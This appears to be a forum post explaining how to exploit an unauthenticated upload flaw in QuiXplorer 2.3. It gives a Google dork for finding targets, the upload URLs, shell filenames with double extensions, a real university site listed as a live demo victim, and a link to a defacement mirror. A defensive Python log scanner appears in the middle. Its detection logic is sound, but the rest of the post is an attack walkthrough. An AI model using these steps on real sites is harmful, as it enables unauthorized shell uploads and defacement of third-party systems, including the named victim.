"QuiXplorer 2.3 <= Bugtraq File Upload Vulnerability" Upload shell and deface easily
Open Google.com and type this dork:
intitle:"QuiXplorer 2.3 - the QuiX project"
You'll see a lot of sites; some big websites are vuln too, like the Harvard University website.
Select any website from the search results.
Vulnerability
http://[localhost]/[path]/index.php?action=list&order=name&srt=yes
http://site.com/[xyz]/index.php?action=list&order=name&srt=yes
After going to this URL you will see a file manager.
You can upload your files here, after index.php? Example:
http://site.com/[xyz]/index.php?action=upload&order=name&srt=yes
Shell example: shell.php, shell.asp, shell.html, shell.php.jpg, shell.asp.jpg, or any supported file type.
Click on your file to view it.
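A defender-side check for the request pattern described above, added here as an example and not part of the original post: it scans a web access log for a POST to the `action=upload` URL and for later fetches of files whose names carry a script extension anywhere (so `shell.php.jpg` is caught). The log lines are constructed, and the function name, the combined log format and the `/filestorage/` prefix are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined format, documentation IPs).
SAMPLE_LOG = """\
203.0.113.7 - - [10/Mar/2014:10:00:01 +0000] "GET /files/index.php?action=list&order=name&srt=yes HTTP/1.1" 200 5120
203.0.113.7 - - [10/Mar/2014:10:00:09 +0000] "POST /files/index.php?action=upload&order=name&srt=yes HTTP/1.1" 200 812
203.0.113.7 - - [10/Mar/2014:10:00:15 +0000] "GET /filestorage/shell.php.jpg HTTP/1.1" 200 64
198.51.100.4 - - [10/Mar/2014:10:01:00 +0000] "GET /filestorage/report.pdf HTTP/1.1" 200 90211
198.51.100.4 - - [10/Mar/2014:10:02:00 +0000] "GET /index.php?action=view HTTP/1.1" 200 300
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" \d{3} ')
# A script extension anywhere in the file name, so shell.php.jpg also matches.
SCRIPT_EXT_RE = re.compile(r'\.(php\d?|phtml|asp|aspx)(\.|$)', re.IGNORECASE)

def find_suspicious(log_text, storage_prefix="/filestorage/"):
    """Return (client, reason, url) tuples for upload-then-fetch patterns.

    storage_prefix is an assumed upload directory; set it to the real one.
    """
    findings, uploaders = [], set()
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        client, method, url = m.groups()
        parts = urlsplit(url)
        action = parse_qs(parts.query).get("action", [""])[0]
        if method == "POST" and parts.path.endswith("/index.php") and action == "upload":
            uploaders.add(client)
            findings.append((client, "upload-action", url))
        elif parts.path.startswith(storage_prefix):
            name = parts.path.rsplit("/", 1)[-1]
            if SCRIPT_EXT_RE.search(name):
                reason = "script-fetch-after-upload" if client in uploaders else "script-fetch"
                findings.append((client, reason, url))
    return findings

if __name__ == "__main__":
    for finding in find_suspicious(SAMPLE_LOG):
        print(*finding, sep="\t")
```

Any hit on an install that is not meant to accept anonymous uploads points to a file manager reachable without authentication and a storage directory where the web server executes scripts.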
Live demo :
http://www.hcs.harvard.edu/~eac/letters/files/index.php?action=list&order=name&srt=yes
http://www.hcs.harvard.edu/~eac/letters/files/index.php?action=upload&order=name&srt=yes
http://www.hcs.harvard.edu/~eac/letters/filestorage/
I know some asshole will change the deface,
so it's a mirror of defacements: http://attack-h.org/attack/?id=8452